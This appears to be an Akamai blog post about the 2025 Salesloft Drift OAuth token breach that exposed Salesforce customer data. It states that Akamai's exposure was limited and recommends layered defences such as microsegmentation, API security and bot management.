It’s standard practice for security teams at large organizations to do significant due diligence on their software vendors. They typically look for adherence to Secure By Design principles, compliance with data privacy regulations, and even factors such as doing background checks on the engineers who code the application, among others.
Just like in physical supply chains, it’s often not the primary vendor that causes an issue, but rather a vendor’s vendors. That appears to be what happened in the data breach affecting Salesforce through its integration with Salesloft’s AI chat agent, Drift.
Breaching the platform and extracting data
From early to mid-August 2025, attackers breached Salesloft’s platform to steal OAuth and refresh tokens from Drift’s integration with Salesforce. Attackers then used those tokens to access Salesforce customer instances and extract data like contacts and support case information.
Examples of the kind of data stolen include:
- Names
- Business email addresses
- Business phone numbers
- Job titles
- Regional/location details
- Content from certain support cases
The initial breach is now causing a wave of breaches for Salesforce customers. Evidence shows that attackers are using the extracted data to find credentials for other systems so they can further infiltrate organizations.
No Akamai platforms were involved
Akamai also investigated this incident to determine if attackers were able to misuse OAuth tokens to access our Salesforce instance. We found that only a limited set of data in service support tickets stored had been exposed.
The reason for Akamai’s limited exposure is the automated deletion of personal and other sensitive data in support tickets 120 days after ticket closure as part of Akamai’s privacy and security by design standards. Additionally, we did not find signs of potential misuse of this data. We have notified affected customers of the incident.
This event was restricted to Salesforce. No Akamai platforms, network systems, or production services were involved. No customer traffic data processed on Akamai platforms was impacted. The affected integration was used only within Salesforce and has since been removed.
Best practices to consider
When trying to protect your organization against software supply chain risks such as this one, it’s important to apply a multilayered approach to mitigate potential attacks and quickly contain any that occur. It’s also essential to understand the organization’s security posture to find any gaps and potential ways that a supply chain risk might evade existing protections.
To help secure any gaps that might exist, consider the following layered protections for APIs and AI/LLM apps (such as the Drift chatbot):
- Microsegmentation
- Web application firewall
- API security
- Client-side protection
- Bot management
- Account takeover protection
Microsegmentation
Microsegmentation should be a priority in any layered security model because it directly reduces the impact of supply chain and API-driven breaches. By isolating applications, workloads, and integrations like AI chatbots into tightly controlled zones, it limits attacker movement and shrinks the blast radius of an incident.
This means that even if stolen tokens or vulnerable APIs are exploited, the compromise is contained, critical systems remain protected, and response teams gain clear visibility to identify the threat and act faster. It turns a potential organization-wide crisis into a controlled, manageable event by protecting operations, reducing downtime, and reinforcing Zero Trust where it matters most.
Web application firewall
A web application firewall (WAF) provides the security foundation for defending against modern threats. Strong WAF technology continuously updates and tunes protections to detect anomalies in traffic patterns and to help identify behavior inconsistent with normal application use.
A WAF with the ability to rate the trustworthiness of request sources allows organizations to block traffic from known malicious or suspicious IPs. Comprehensive logging and visibility provide the context security teams need to investigate incidents and coordinate with additional protections.
API security
API-specific protections could have helped companies detect this attack by identifying the anomalous behavior associated with the compromised OAuth tokens. Even though the attacker was using valid credentials, their activity patterns — such as running mass queries against Salesforce APIs, accessing data from unusual IP addresses, and attempting to delete jobs to cover their tracks — would have deviated from the baseline of normal use.
Akamai’s behavioral analytics and continuous monitoring are designed to flag these kinds of irregularities in real time, enabling security teams to quickly investigate and respond before large volumes of sensitive data can be exfiltrated.
Client-side protection
When apps use scripts or agents to pass information back and forth in the browser, it’s critical to be able to detect changes in the scripts. Is the script asking for information it doesn’t normally ask for? An inventory of all scripts and a way to flag script changes can prevent these kinds of attacks.
Bot management
Strong bot detection and bot management is important since AI/LLM bots are just that: bots. It’s especially critical for known bots like the Drift chatbot, for which the bot management solution can use the signature and other defining characteristics to determine if the bot is legitimate or an impersonator, and whether the bot is demonstrating risky behaviors compared with its baseline behavior.
Account takeover protection
Although in this case we’re talking about non-human identity (the identity of the Drift bot), account takeover protection solutions are designed to detect when the correct credentials are actually being used by someone other than the legitimate account owner.
Assigning a risk score to the login can prevent the attacker from gaining access, and session behavior monitoring can detect risky behavior and end the session if the attacker happens to gain access.
AI application protection
Generative AI–powered applications are increasingly recognized as exposed enterprise vulnerabilities. If an attacker has access to the AI application, they could manipulate the app or change its guardrails to give malicious or toxic responses to user prompts, as well as to extract information from the app directly. AI-specific protections are an important layered approach to protecting AI applications.
Apply a multilayered security approach
Organizations will likely never have the resources to do due diligence on every vendor in their software supply chain. And even if they did find some vulnerabilities, it likely would be impractical to avoid using some of the major software vendors or asking those vendors to change their technology partners.
As a result, the most realistic solution is to apply a multilayered security approach to protect against supply chain breaches.
Tags
